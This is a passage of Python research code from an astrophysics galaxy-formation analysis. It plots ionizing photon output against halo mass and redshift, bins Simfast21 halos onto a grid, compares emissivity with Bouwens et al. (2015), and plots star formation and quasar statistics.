If fesc_prescription == 0, gives the constant value for the escape fraction.
If fesc_prescription == 1 or == 2, gives A and B with the form [A, B].
fitpath : string (optional)
If this parameter is defined, we will save the Mvir-Ngamma results in a text file (not needed if not saving).
Defines the base path for where we are saving the results.
Returns
-------
No returns.
Generates and saves the plot (named via output_tag).
Units
-----
Ngamma is in units of 1.0e50 s^-1.
'''
print("Plotting ngamma*fesc against the halo mass")
## Array initialization. ##
title = []
redshift_labels = []
mean_ngammafesc_array = []
std_ngammafesc_array = []
mean_halomass_array = []
std_halomass_array = []
bin_middle_array = []
for model_number in range(0, len(SnapList)):
redshift_labels.append([])
mean_ngammafesc_array.append([])
std_ngammafesc_array.append([])
mean_halomass_array.append([])
std_halomass_array.append([])
bin_middle_array.append([])
for model_number in range(0, len(SnapList)):
for snapshot_idx in range(0, len(SnapList[model_number])):
print("Doing Snapshot {0}".format(SnapList[model_number][snapshot_idx]))
tmp = 'z = %.2f' %(AllVars.SnapZ[SnapList[model_number][snapshot_idx]])
redshift_labels[model_number].append(tmp)
N = N_Ngamma[model_number][snapshot_idx]
mean_ngammafesc_array[model_number], std_ngammafesc_array[model_number] = calculate_pooled_stats(mean_ngammafesc_array[model_number], std_ngammafesc_array[model_number], mean_mvir_Ngamma[model_number][snapshot_idx], std_mvir_Ngamma[model_number][snapshot_idx], N) # Collate the values from all processors.
bin_middle_array[model_number].append(np.arange(m_low, m_high+bin_width, bin_width)[:-1] + bin_width * 0.5)
if rank == 0:
f = plt.figure()
ax1 = plt.subplot(111)
for model_number in range(0, len(SnapList)):
count = 0
for snapshot_idx in range(0, len(SnapList[model_number])):
if model_number == 0:
title = redshift_labels[model_number][snapshot_idx]
else:
title = ''
mean = np.zeros((len(mean_ngammafesc_array[model_number][snapshot_idx])), dtype = np.float32)
std = np.zeros((len(mean_ngammafesc_array[model_number][snapshot_idx])), dtype=np.float32)
for i in range(0, len(mean)):
if(mean_ngammafesc_array[model_number][snapshot_idx][i] < 1e-10):
mean[i] = np.nan
std[i] = np.nan
else:
mean[i] = np.log10(mean_ngammafesc_array[model_number][snapshot_idx][i] * 1.0e50) # Remember that the input data is in units of 1.0e50 s^-1.
std[i] = 0.434 * std_ngammafesc_array[model_number][snapshot_idx][i] / mean_ngammafesc_array[model_number][snapshot_idx][i] # We're plotting in log space so the standard deviation is 0.434*log10(std)/log10(mean).
bin_middle = bin_middle_array[model_number][snapshot_idx]
if (count < 4): # Only plot at most 5 lines.
ax1.plot(bin_middle, mean, color = PlotScripts.colors[snapshot_idx], linestyle = PlotScripts.linestyles[model_number], rasterized = True, label = title, linewidth = PlotScripts.global_linewidth)
count += 1
## In this block we save the Mvir-Ngamma results to a file. ##
if (fesc_prescription == None or fesc_normalization == None or fitpath == None):
raise ValueError("You've specified you want to save the Mvir-Ngamma results but haven't provided an escape fraction prescription, normalization and base path name")
# Note: All the checks that escape fraction normalization was written correctly were performed in 'calculate_fesc()', hence it will be correct by this point and we don't need to double check.
if (fesc_prescription[model_number] == 0): # Slightly different naming scheme for the constant case (it only has a float for fesc_normalization).
fname = "%s/fesc%d_%.3f_z%.3f.txt" %(fitpath, fesc_prescription[model_number], fesc_normalization[model_number], AllVars.SnapZ[SnapList[model_number][snapshot_idx]])
elif (fesc_prescription[model_number] == 1 or fesc_prescription[model_number] == 2):
fname = "%s/fesc%d_A%.3eB%.3f_z%.3f.txt" %(fitpath, fesc_prescription[model_number], fesc_normalization[model_number][0], fesc_normalization[model_number][1], AllVars.SnapZ[SnapList[model_number][snapshot_idx]])
f = open(fname, "w+")
if not os.access(fname, os.W_OK):
print("The filename is {0}".format(fname))
raise ValueError("Can't write to this file.")
for i in range(0, len(bin_middle)):
f.write("%.4f %.4f %.4f %d\n" %(bin_middle[i], mean[i], std[i], N_Ngamma[model_number][snapshot_idx][i]))
f.close()
print("Wrote successfully to file {0}".format(fname))
##
for model_number in range(0, len(SnapList)): # Just plot some garbage to get the legend labels correct.
ax1.plot(np.nan, np.nan, color = 'k', linestyle = PlotScripts.linestyles[model_number], rasterized = True, label = model_tags[model_number], linewidth = PlotScripts.global_linewidth)
ax1.set_xlabel(r'$\log_{10}\ M_{\mathrm{vir}}\ [M_{\odot}]$', size = PlotScripts.global_fontsize)
ax1.set_ylabel(r'$\log_{10}\ \dot{N}_\gamma \: f_\mathrm{esc} \: [\mathrm{s}^{-1}]$', size = PlotScripts.global_fontsize)
ax1.set_xlim([8.5, 12])
ax1.xaxis.set_minor_locator(mtick.MultipleLocator(0.1))
leg = ax1.legend(loc='upper left', numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize('medium')
outputFile = './' + output_tag + output_format
plt.savefig(outputFile, bbox_inches='tight') # Save the figure
print('Saved file to'.format(outputFile))
plt.close()
def bin_Simfast_halos(RedshiftList, SnapList, halopath, fitpath, fesc_prescription, fesc_normalization, GridSize, output_tag):
for model_number in range(0, len(fesc_prescription)):
for halo_z_idx in range(0, len(RedshiftList)):
snapshot_idx = min(range(len(SnapList)), key=lambda i: abs(SnapList[i]-RedshiftList[halo_z_idx])) # This finds the index of the simulation redshift that most closely matches the Halo redshift.
print("Binning Halo redshift {0}".format(RedshiftList[halo_z_idx]))
print("For the Halo redshift {0:.3f} the nearest simulation redshift is {1:.3f}".format(RedshiftList[halo_z_idx], SnapList[snapshot_idx]))
if (fesc_prescription[model_number] == 0):
fname = "%s/fesc%d_%.3f_z%.3f.txt" %(fitpath, fesc_prescription[model_number], fesc_normalization[model_number], AllVars.SnapZ[snapshot_idx])
elif (fesc_prescription[model_number] == 1 or fesc_prescription[model_number] == 2):
fname = "%s/fesc%d_A%.3eB%.3f_z%.3f.txt" %(fitpath, fesc_prescription[model_number], fesc_normalization[model_number][0], fesc_normalization[model_number][1], AllVars.SnapZ[snapshot_idx])
print("Reading in file {0}".format(fname))
## Here we read in the results from the Mvir-Ngamma binning. ##
f = open(fname, 'r')
fit_mvir, fit_mean, fit_std, fit_N = np.loadtxt(f, unpack = True)
f.close()
## Here we read in the halos created by Simfast21 ##
# The data file has the structure:
# long int N_halos
# Then an entry for each halo:
# float Mass
# float x, y, z positions.
# NOTE: The x,y,z positions are the grid indices but are still floats (because Simfast21 is weird like that).
Halodesc_full = [
('Halo_Mass', np.float32),
('Halo_x', np.float32),
('Halo_y', np.float32),
('Halo_z', np.float32)
]
names = [Halodesc_full[i][0] for i in range(len(Halodesc_full))]
formats = [Halodesc_full[i][1] for i in range(len(Halodesc_full))]
Halo_Desc = np.dtype({'names':names, 'formats':formats}, align=True)
fname = "%s/halonl_z%.3f_N%d_L100.0.dat.catalog" %(halopath, RedshiftList[halo_z_idx], GridSize)
f = open(fname, 'rb')
N_Halos = np.fromfile(f, count = 1, dtype = np.long)
Halos = np.fromfile(f, count = N_Halos, dtype = Halo_Desc)
binned_nion = np.zeros((GridSize*GridSize*GridSize), dtype = float32) # This grid will contain the ionizing photons that results from the binning.
binned_Halo_Mass = np.digitize(np.log10(Halos['Halo_Mass']), fit_mvir) # Places the Simfast21 halos into the correct halo mass bins defined by the Mvir-Ngamma results.
binned_Halo_Mass[binned_Halo_Mass == len(fit_mvir)] = len(fit_mvir) - 1 # Fixes up the edge case.
## Fore each Halo we now assign it an ionizing flux. ##
# This flux is determined by drawing a random number from a normal distribution with mean and standard deviation given by the Mvir-Ngamma results.
# NOTE: Remember the Mvir-Ngamma results are in units of log10(s^-1).
fit_nan = 0
for i in range(0, N_Halos):
if(np.isnan(fit_mean[binned_Halo_Mass[i]]) == True or np.isnan(fit_std[binned_Halo_Mass[i]]) == True): # This halo had mass that was not covered by the Mvir-Ngamma fits.
fit_nan += 1
continue
nion_halo = np.random.normal(fit_mean[binned_Halo_Mass[i]], fit_std[binned_Halo_Mass[i]])
## Because of how Simfast21 does their binning, we have some cases where the Halos are technically outside the box. Just fix them up. ##
x_grid = int(Halos['Halo_x'][i])
if x_grid >= GridSize:
x_grid = GridSize - 1
if x_grid < 0:
x_grid = 0
y_grid = int(Halos['Halo_y'][i])
if y_grid >= GridSize:
y_grid = GridSize - 1
if y_grid < 0:
y_grid = 0
z_grid = int(Halos['Halo_z'][i])
if z_grid >= GridSize:
z_grid = GridSize - 1
if z_grid < 0:
z_grid = 0
idx = x_grid * GridSize*GridSize + y_grid * GridSize + z_grid
binned_nion[idx] += pow(10, nion_halo)/1.0e50
# print"We had %d halos (out of %d, so %.4f fraction) that had halo mass that was not covered by the Mvir-Ngamma results." %(fit_nan, N_Halos, float(fit_nan)/float(N_Halos))
# print "There were %d cells with a non-zero ionizing flux." %(len(binned_nion[binned_nion != 0]))
binned_nion = binned_nion.reshape((GridSize,GridSize,GridSize))
cut_slice = 0
cut_width = 512
nion_slice = binned_nion[:,:, cut_slice:cut_slice+cut_width].mean(axis=-1)*1.0e50
ax1 = plt.subplot(211)
im = ax1.imshow(np.log10(nion_slice), interpolation='bilinear', origin='low', extent =[0,AllVars.BoxSize,0,AllVars.BoxSize], cmap = 'Purples', vmin = 48, vmax = 53)
cbar = plt.colorbar(im, ax = ax1)
cbar.set_label(r'$\mathrm{log}_{10}N_{\gamma} [\mathrm{s}^{-1}]$')
ax1.set_xlabel(r'$\mathrm{x} (h^{-1}Mpc)$')
ax1.set_ylabel(r'$\mathrm{y} (h^{-1}Mpc)$')
ax1.set_xlim([0.0, AllVars.BoxSize])
ax1.set_ylim([0.0, AllVars.BoxSize])
title = r"$z = %.3f$" %(RedshiftList[halo_z_idx])
ax1.set_title(title)
ax2 = plt.subplot(212)
w = np.where((Halos['Halo_z'][:] > cut_slice) & (Halos['Halo_z'][:] <= cut_slice + cut_width))[0]
x_plot = Halos['Halo_x'] * float(AllVars.BoxSize)/float(GridSize)
y_plot = Halos['Halo_y'] * float(AllVars.BoxSize)/float(GridSize)
z_plot = Halos['Halo_z'][w] * float(AllVars.BoxSize)/float(GridSize)
ax2.scatter(x_plot[w], y_plot[w], s = 2, alpha = 0.5)
ax2.set_xlabel(r'$\mathrm{x} (h^{-1}Mpc)$')
ax2.set_ylabel(r'$\mathrm{y} (h^{-1}Mpc)$')
ax2.set_xlim([0.0, AllVars.BoxSize])
ax2.set_ylim([0.0, AllVars.BoxSize])
tmp = "z%.3f" %(RedshiftList[halo_z_idx])
plt.tight_layout()
outputFile = './' + output_tag + tmp + output_format
plt.savefig(outputFile) # Save the figure
print('Saved file to {0}'.format(outputFile))
plt.close()
def plot_photoncount(SnapList, sum_nion, simulation_norm, FirstFile, LastFile, NumFiles, model_tags, output_tag):
'''
Plots the ionizing emissivity as a function of redshift.
We normalize the emissivity to Mpc^-3 and this function allows the read-in of only a subset of the volume.
Parallel compatible.
Parameters
---------
SnapList : Nested array, SnapList[model_number0] = [snapshot0_model0, ..., snapshotN_model0], with length equal to the number of models.
Snapshots for each model, defines the x-axis we plot against.
sum_nion : Nested 1-dimensional array, sum_nion[z0, z1, ..., zn], with length equal to the number of redshifts.
Number of escape ionizing photons (i.e., photon rate times the local escape fraction) at each redshift.
In units of 1.0e50 s^-1.
simulation_norm : array of ints with length equal to the number of models.
Denotes which simulation each model uses.
0 : MySim
1 : Mini-Millennium
2 : Tiamat (down to z = 5)
3 : Extended Tiamat (down to z = 1.6ish).
4 : Britton's Simulation
FirstFile, LastFile, NumFile : array of integers with length equal to the number of models.
The file numbers for each model that were read in (defined by the range between [FirstFile, LastFile] inclusive) and the TOTAL number of files for this model (we may only be plotting a subset of the volume).
model_tags : array of strings with length equal to the number of models.
Strings that contain the tag for each model. Will be placed on the plot.
output_tag : string
Name of the file that will be generated.
Returns
-------
No returns.
Generates and saves the plot (named via output_tag).
Units
-----
sum_nion is in units of 1.0e50 s^-1.
'''
print("Plotting the ionizing emissivity.")
sum_array = []
for model_number in range(0, len(SnapList)):
if(simulation_norm[model_number] == 0):
AllVars.Set_Params_Mysim()
if(simulation_norm[model_number] == 1):
AllVars.Set_Params_MiniMill()
elif(simulation_norm[model_number] == 3):
AllVars.Set_Params_Tiamat_extended()
elif(simulation_norm[model_number] == 4):
AllVars.Set_Params_Britton()
elif(simulation_norm[model_number] == 5):
AllVars.Set_Params_Kali()
else:
print("Simulation norm was set to {0}.".format(simulation_norm[model_number]))
raise ValueError("This option has been implemented yet. Get your head in the game Jacob!")
sum_array.append([])
for snapshot_idx in range(0, len(SnapList[model_number])):
nion_sum_snapshot = comm.reduce(sum_nion[model_number][snapshot_idx], op = MPI.SUM, root = 0)
if rank == 0:
sum_array[model_number].append(nion_sum_snapshot * 1.0e50 / (pow(AllVars.BoxSize / AllVars.Hubble_h,3) * (float(LastFile[model_number] - FirstFile[model_number] + 1) / float(NumFiles[model_number]))))
if (rank == 0):
ax1 = plt.subplot(111)
for model_number in range(0, len(SnapList)):
if(simulation_norm[model_number] == 0):
cosmo = AllVars.Set_Params_Mysim()
if(simulation_norm[model_number] == 1):
cosmo = AllVars.Set_Params_MiniMill()
elif(simulation_norm[model_number] == 3):
cosmo = AllVars.Set_Params_Tiamat_extended()
elif(simulation_norm[model_number] == 4):
cosmo = AllVars.Set_Params_Britton()
elif(simulation_norm[model_number] == 5):
cosmo = AllVars.Set_Params_Kali()
else:
print("Simulation norm was set to {0}.".format(simulation_norm[model_number]))
raise ValueError("This option has been implemented yet. Get your head in the game Jacob!")
t = np.empty(len(SnapList[model_number]))
for snapshot_idx in range(0, len(SnapList[model_number])):
t[snapshot_idx] = (AllVars.t_BigBang - cosmo.lookback_time(AllVars.SnapZ[SnapList[model_number][snapshot_idx]]).value) * 1.0e3
t = [t for t, N in zip(t, sum_array[model_number]) if N > 1.0]
sum_array[model_number] = [x for x in sum_array[model_number] if x > 1.0]
print("The total number of ionizing photons for model {0} is {1} s^1 Mpc^-3".format(model_number, sum(sum_array[model_number])))
print(np.log10(sum_array[model_number]))
ax1.plot(t, np.log10(sum_array[model_number]), color = PlotScripts.colors[model_number], linestyle = PlotScripts.linestyles[model_number], label = model_tags[model_number], linewidth = PlotScripts.global_linewidth)
#ax1.fill_between(t, np.subtract(mean,std), np.add(mean,std), color = colors[model_number], alpha = 0.25)
ax1.xaxis.set_minor_locator(mtick.MultipleLocator(PlotScripts.time_tickinterval))
#ax1.yaxis.set_minor_locator(mtick.MultipleLocator(0.025))
ax1.set_xlim(PlotScripts.time_xlim)
ax1.set_ylim([48.5, 51.5])
ax2 = ax1.twiny()
t_plot = (AllVars.t_BigBang - cosmo.lookback_time(PlotScripts.z_plot).value) * 1.0e3 # Corresponding Time values on the bottom.
z_labels = ["$%d$" % x for x in PlotScripts.z_plot] # Properly Latex-ize the labels.
ax2.set_xlabel(r"$z$", size = PlotScripts.global_labelsize)
ax2.set_xlim(PlotScripts.time_xlim)
ax2.set_xticks(t_plot) # Set the ticks according to the time values on the bottom,
ax2.set_xticklabels(z_labels) # But label them as redshifts.
ax1.set_xlabel(r"$\mathrm{Time \: Since \: Big \: Bang \: [Myr]}$", size = PlotScripts.global_fontsize)
ax1.set_ylabel(r'$\sum f_\mathrm{esc}\dot{N}_\gamma \: [\mathrm{s}^{-1}\mathrm{Mpc}^{-3}]$', fontsize = PlotScripts.global_fontsize)
plot_time = 1
bouwens_z = np.arange(6,16) # Redshift range for the observations.
bouwens_t = (AllVars.t_BigBang - cosmo.lookback_time(bouwens_z).value) * 1.0e3 # Corresponding values for what we will plot on the x-axis.
bouwens_1sigma_lower = [50.81, 50.73, 50.60, 50.41, 50.21, 50.00, 49.80, 49.60, 49.39, 49.18] # 68% Confidence Intervals for the ionizing emissitivity from Bouwens 2015.
bouwens_1sigma_upper = [51.04, 50.85, 50.71, 50.62, 50.56, 50.49, 50.43, 50.36, 50.29, 50.23]
bouwens_2sigma_lower = [50.72, 50.69, 50.52, 50.27, 50.01, 49.75, 49.51, 49.24, 48.99, 48.74] # 95% CI.
bouwens_2sigma_upper = [51.11, 50.90, 50.74, 50.69, 50.66, 50.64, 50.61, 50.59, 50.57, 50.55]
if plot_time == 1:
ax1.fill_between(bouwens_t, bouwens_1sigma_lower, bouwens_1sigma_upper, color = 'k', alpha = 0.2)
ax1.fill_between(bouwens_t, bouwens_2sigma_lower, bouwens_2sigma_upper, color = 'k', alpha = 0.4, label = r"$\mathrm{Bouwens \: et \: al. \: (2015)}$")
else:
ax1.fill_between(bouwens_z, bouwens_1sigma_lower, bouwens_1sigma_upper, color = 'k', alpha = 0.2)
ax1.fill_between(bouwens_z, bouwens_2sigma_lower, bouwens_2sigma_upper, color = 'k', alpha = 0.4, label = r"$\mathrm{Bouwens \: et \: al. \: (2015)}$")
# ax1.text(0.075, 0.965, '(a)', horizontalalignment='center', verticalalignment='center', transform = ax.transAxes)
ax1.text(350, 50.0, r"$68\%$", horizontalalignment='center', verticalalignment = 'center', fontsize = PlotScripts.global_labelsize)
ax1.text(350, 50.8, r"$95\%$", horizontalalignment='center', verticalalignment = 'center', fontsize = PlotScripts.global_labelsize)
leg = ax1.legend(loc='lower right', numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize(PlotScripts.global_legendsize)
plt.tight_layout()
outputFile = './{0}{1}'.format(output_tag, output_format)
plt.savefig(outputFile) # Save the figure
print('Saved file to {0}'.format(outputFile))
plt.close()
##
def plot_singleSFR(galaxies_filepath_array, merged_galaxies_filepath_array, number_snapshots, simulation_norm, model_tags, output_tag):
SFR_gal = []
SFR_ensemble = []
ejected_gal = []
ejected_ensemble = []
infall_gal = []
infall_ensemble = []
ejectedmass_gal = []
ejectedmass_ensemble = []
N_random = 1
ax1 = plt.subplot(111)
# ax3 = plt.subplot(122)
#ax5 = plt.subplot(133)
look_for_alive = 1
#idx_array = [20004, 20005, 20016]
#halonr_array = [7381]
halonr_array = [389106]
#halonr_array = [36885]
for model_number in range(0, len(model_tags)):
if(simulation_norm[model_number] == 0):
AllVars.Set_Params_Mysim()
if(simulation_norm[model_number] == 1):
AllVars.Set_Params_MiniMill()
elif(simulation_norm[model_number] == 3):
AllVars.Set_Params_Tiamat_extended()
else:
print("Simulation norm was set to {0}.".format(simulation_norm[model_number]))
raise ValueError("This option has been implemented yet. Get your head in the game Jacob!")
SFR_gal.append([])
SFR_ensemble.append([])
ejected_gal.append([])
ejected_ensemble.append([])
infall_gal.append([])
infall_ensemble.append([])
ejectedmass_gal.append([])
ejectedmass_ensemble.append([])
GG, Gal_Desc = ReadScripts.ReadGals_SAGE_DelayedSN(galaxies_filepath_array[model_number], 0, number_snapshots[model_number], comm) # Read in the correct galaxy file.
G_Merged, Merged_Desc = ReadScripts.ReadGals_SAGE_DelayedSN(merged_galaxies_filepath_array[model_number], 0, number_snapshots[model_number], comm) # Also need the merged galaxies.
G = ReadScripts.Join_Arrays(GG, G_Merged, Gal_Desc) # Then join them together for all galaxies that existed at this Redshift.
if look_for_alive == 1:
G.GridHistory[G.GridHistory >= 0] = 1
G.GridHistory[G.GridHistory < 0] = 0
alive = np.sum(G.GridHistory, axis = 1)
# print "The galaxy that was present in the most snapshots is %d which was in %d snaps" %(np.argmax(alive), np.amax(alive))
most_alive = alive.argsort()[-10:][::-1] # Finds the 3 galaxies alive for the most snapshots. Taken from https://stackoverflow.com/questions/6910641/how-to-get-indices-of-n-maximum-values-in-a-numpy-array
# print G.HaloNr[most_alive]
t = np.empty((number_snapshots[model_number]))
for snapshot_idx in range(0, number_snapshots[model_number]):
w = np.where((G.GridHistory[:, snapshot_idx] != -1) & (G.GridStellarMass[:, snapshot_idx] > 0.0) & (G.GridStellarMass[:, snapshot_idx] < 1e5) & (G.GridFoFMass[:, snapshot_idx] >= m_low_SAGE) & (G.GridFoFMass[:, snapshot_idx] <= m_high_SAGE))[0] # Only include those galaxies that existed at the current snapshot, had positive (but not infinite) stellar/Halo mass and Star formation rate.
SFR_ensemble[model_number].append(np.mean(G.GridSFR[w,snapshot_idx]))
ejected_ensemble[model_number].append(np.mean(G.GridOutflowRate[w, snapshot_idx]))
infall_ensemble[model_number].append(np.mean(G.GridInfallRate[w, snapshot_idx]))
t[snapshot_idx] = (t_BigBang - cosmo.lookback_time(AllVars.SnapZ[snapshot_idx]).value) * 1.0e3
for p in range(0, N_random):
random_idx = (np.where((G.HaloNr == halonr_array[p]))[0])[0]
SFR_gal[model_number].append(G.GridSFR[random_idx]) # Remember the star formation rate history of the galaxy.
ejected_gal[model_number].append(G.GridOutflowRate[random_idx])
infall_gal[model_number].append(G.GridInfallRate[random_idx])
ejectedmass_gal[model_number].append(G.GridEjectedMass[random_idx])
#SFR_gal[model_number][p][SFR_gal[model_number][p] < 1.0e-15] = 1
for snapshot_idx in range(0, number_snapshots[model_number]):
if snapshot_idx == 0:
pass
elif(G.GridHistory[random_idx, snapshot_idx] == -1):
SFR_gal[model_number][p][snapshot_idx] = SFR_gal[model_number][p][snapshot_idx - 1]
# SFR_ensemble[model_number] = np.nan_to_num(SFR_ensemble[model_number])
# SFR_ensemble[model_number][SFR_ensemble[model_number] < 1.0e-15] = 1
# ejected_ensemble[model_number][ejected_ensemble[model_number] < 1.0e-15] = 1
ax1.plot(t, SFR_ensemble[model_number], color = PlotScripts.colors[0], linestyle = PlotScripts.linestyles[model_number], label = model_tags[model_number], linewidth = PlotScripts.global_linewidth)
ax1.plot(t, ejected_ensemble[model_number], color = PlotScripts.colors[1], linestyle = PlotScripts.linestyles[model_number], linewidth = PlotScripts.global_linewidth, alpha = 1.0)
#ax5.plot(t, infall_ensemble[model_number], color = PlotScripts.colors[2], linestyle = PlotScripts.linestyles[model_number], linewidth = PlotScripts.global_linewidth, alpha = 1.0)
#ax5.plot(t, ejectedmass_ensemble[model_number], color = PlotScripts.colors[2], linestyle = PlotScripts.linestyles[model_number], linewidth = PlotScripts.global_linewidth, alpha = 1.0)
for p in range(0, N_random):
ax1.plot(t, SFR_gal[model_number][p], color = PlotScripts.colors[0], linestyle = PlotScripts.linestyles[model_number], alpha = 0.5, linewidth = 1)
ax1.plot(t, ejected_gal[model_number][p], color = PlotScripts.colors[1], linestyle = PlotScripts.linestyles[model_number], alpha = 0.5, linewidth = 1)
#ax5.plot(t, infall_gal[model_number][p], color = PlotScripts.colors[2], linestyle = PlotScripts.linestyles[model_number], alpha = 0.5, linewidth = 1)
#ax5.plot(t, ejectedmass_gal[model_number][p], color = PlotScripts.colors[2], linestyle = PlotScripts.linestyles[model_number], alpha = 0.5, linewidth = 1)
#ax1.plot(t, SFR_gal[model_number][p], color = PlotScripts.colors[0], linestyle = PlotScripts.linestyles[model_number], alpha = 1.0, linewidth = 1, label = model_tags[model_number])
#ax1.plot(t, ejected_gal[model_number][p], color = PlotScripts.colors[1], linestyle = PlotScripts.linestyles[model_number], alpha = 1.0, linewidth = 1, label = model_tags[model_number])
ax1.plot(np.nan, np.nan, color = 'r', linestyle = '-', label = "SFR")
ax1.plot(np.nan, np.nan, color = 'b', linestyle = '-', label = "Outflow")
# exit()
#ax1.plot(np.nan, np.nan, color = PlotScripts.colors[0], label = 'SFR')
#ax1.plot(np.nan, np.nan, color = PlotScripts.colors[1], label = 'Outflow')
ax1.set_yscale('log', nonposy='clip')
ax1.set_ylabel(r"$\mathrm{Mass \: Flow} \: [\mathrm{M}_\odot \mathrm{yr}^{-1}]$")
ax1.set_xlabel(r"$\mathrm{Time \: Since \: Big \: Bang \: [Myr]}$", size = PlotScripts.global_fontsize)
ax1.set_xlim(PlotScripts.time_xlim)
ax1.set_ylim([1e-6, 1e3])
'''
ax3.set_yscale('log', nonposy='clip')
ax3.set_ylabel(r"$\mathrm{Outflow \: Rate} \: [\mathrm{M}_\odot \mathrm{yr}^{-1}]$")
ax3.set_xlabel(r"$\mathrm{Time \: Since \: Big \: Bang \: [Myr]}$", size = PlotScripts.global_fontsize)
ax3.set_xlim(PlotScripts.time_xlim)
ax3.set_ylim([1e-8, 1e3])
ax5.set_yscale('log', nonposy='clip')
#ax5.set_ylabel(r"$\mathrm{Infall \: Rate} \: [\mathrm{M}_\odot \mathrm{yr}^{-1}]$")
ax5.set_ylabel(r"$\mathrm{Ejected Mass} [\mathrm{M}_\odot]$")
ax5.set_xlabel(r"$\mathrm{Time \: Since \: Big \: Bang \: [Myr]}$", size = PlotScripts.global_fontsize)
ax5.set_xlim(PlotScripts.time_xlim)
#ax5.set_ylim([1e-8, 1e3])
ax5.set_ylim([1e6, 1e10])
'''
ax2 = ax1.twiny()
#ax4 = ax3.twiny()
#ax6 = ax5.twiny()
t_plot = (t_BigBang - cosmo.lookback_time(PlotScripts.z_plot).value) * 1.0e3 # Corresponding Time values on the bottom.
z_labels = ["$%d$" % x for x in PlotScripts.z_plot] # Properly Latex-ize the labels.
ax2.set_xlabel(r"$z$", size = PlotScripts.global_labelsize)
ax2.set_xlim(PlotScripts.time_xlim)
ax2.set_xticks(t_plot) # Set the ticks according to the time values on the bottom,
ax2.set_xticklabels(z_labels) # But label them as redshifts.
'''
ax4.set_xlabel(r"$z$", size = PlotScripts.global_labelsize)
ax4.set_xlim(PlotScripts.time_xlim)
ax4.set_xticks(t_plot) # Set the ticks according to the time values on the bottom,
ax4.set_xticklabels(z_labels) # But label them as redshifts.
ax6.set_xlabel(r"$z$", size = PlotScripts.global_labelsize)
ax6.set_xlim(PlotScripts.time_xlim)
ax6.set_xticks(t_plot) # Set the ticks according to the time values on the bottom,
ax6.set_xticklabels(z_labels) # But label them as redshifts.
'''
plt.tight_layout()
leg = ax1.legend(loc='lower right', numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize(PlotScripts.global_legendsize)
outputFile = './Halo%d_mlow%.2f_%s%s' %(halonr_array[0], m_low_SAGE, output_tag, output_format)
plt.savefig(outputFile, bbox_inches='tight') # Save the figure
print('Saved file to {0}'.format(outputFile))
plt.close()
##
def plot_quasars_count(SnapList, PlotList, N_quasars_z, N_quasars_boost_z, N_gal_z, mean_quasar_activity, std_quasar_activity, N_halo, N_merger_halo, N_gal, N_merger_galaxy, fesc_prescription, simulation_norm, FirstFile, LastFile, NumFile, model_tags, output_tag):
'''
Parameters
---------
SnapList : Nested 'array-like` of ints, SnapList[model_number0] = [snapshot0_model0, ..., snapshotN_model0], with length equal to the number of models.
Snapshots that we plot the quasar density at for each model.
PlotList : Nested array of ints, PlotList[model_number0]= [plotsnapshot0_model0, ..., plotsnapshotN_model0], with length equal to the number of models.
Snapshots that will be plotted for the quasar activity as a function of halo mass.
N_quasars_z : Nested array of floats, N_quasars_z[model_number0] = [N_quasars_z0, N_quasars_z1, ..., N_quasars_zN]. Outer array has length equal to the number of models, inner array has length equal to length of the model's SnapList.
Number of quasars, THAT WENT OFF, during the given redshift.
N_quasars_boost_z : Nested array of floats, N_quasars_boost_z[model_number0] = [N_quasars_boost_z0, N_quasars_boost_z1, ..., N_quasars_boost_zN]. Outer array has length equal to the number of models, inner array has length equal to length of the model's SnapList.
Number of galaxies that had their escape fraction boosted by quasar activity.
N_gal_z : Nested array of floats, N_gal_z[model_number0] = [N_gal_z0, N_gal_z1, ..., N_gal_zN]. Outer array has length equal to the number of models, inner array has length equal to length of the model's SnapList.
Number of galaxies at each redshift.
mean_quasar_activity, std_quasar_activity : Nested 2-dimensional array of floats, mean_quasar_activity[model_number0][snapshot0] = [bin0quasar_activity, ..., binNquasar_activity]. Outer array has length equal to the number of models, inner array has length equal to the length of the model's snaplist and most inner array has length equal to the number of halo bins (NB).
Mean/std fraction of galaxies that had quasar go off during each snapshot as a function of halo mass.
NOTE : This is for quasars going off, not for galaxies that have their escape fraction being boosted.
fesc_prescription : Array with length equal to the number of models.
Denotes what escape fraction prescription each model used. Quasars are only tracked when fesc_prescription == 3.
simulation_norm : array with length equal to the number of models.
Denotes which simulation each model uses.
0 : MySim
1 : Mini-Millennium
2 : Tiamat (down to z = 5)
3 : Extended Tiamat (down to z = 1.6ish).
4 : Britton's Simulation
5 : Kali
FirstFile, LastFile, NumFile : array of integers with length equal to the number of models.
The file numbers for each model that were read in (defined by the range between [FirstFile, LastFile] inclusive) and the TOTAL number of files for this model (we may only be plotting a subset of the volume).
model_tags : array of strings with length equal to the number of models.
Strings that contain the tag for each model. Will be placed on the plot.
output_tag : string
Name of the file that will be generated. File will be saved in the current directory with the output format defined by the 'output_format' variable at the beggining of the file.
Returns
-------
No returns.
Generates and saves the plot (named via output_tag).
Units
-----
No relevant units.
'''
print("Plotting quasar count/density")
if rank == 0:
fig = plt.figure()
ax1 = fig.add_subplot(111)
ax6 = ax1.twinx()
fig2 = plt.figure()
ax3 = fig2.add_subplot(111)
ax5 = ax3.twinx()
fig3 = plt.figure()
ax7 = fig3.add_subplot(111)
fig4 = plt.figure()
ax50 = fig4.add_subplot(111)
fig5 = plt.figure()
ax55 = fig5.add_subplot(111)
fig6 = plt.figure()
ax56 = fig6.add_subplot(111)
mean_quasar_activity_array = []
std_quasar_activity_array = []
N_quasar_activity_array = []
N_gal_halo_array = []
N_gal_array = []
merger_counts_halo_array = []
merger_counts_galaxy_array = []
bin_middle_halo_array = []
bin_middle_galaxy_array = []
for model_number in range(0, len(SnapList)): # Does this for each of the models.
if (fesc_prescription[model_number] != 3): # Want to skip the models that didn't count quasars.
continue
## Normalization for each model. ##
if (simulation_norm[model_number] == 0):
AllVars.Set_Params_Mysim()
elif (simulation_norm[model_number] == 1):
AllVars.Set_Params_MiniMill()
elif (simulation_norm[model_number] == 2):
AllVars.Set_Params_Tiamat()
elif (simulation_norm[model_number] == 3):
AllVars.Set_Params_Tiamat_extended()
elif (simulation_norm[model_number] == 4):
AllVars.Set_Params_Britton()
elif (simulation_norm[model_number] == 5):
AllVars.Set_Params_Kali()
mean_quasar_activity_array.append([])
std_quasar_activity_array.append([])
N_quasar_activity_array.append([])
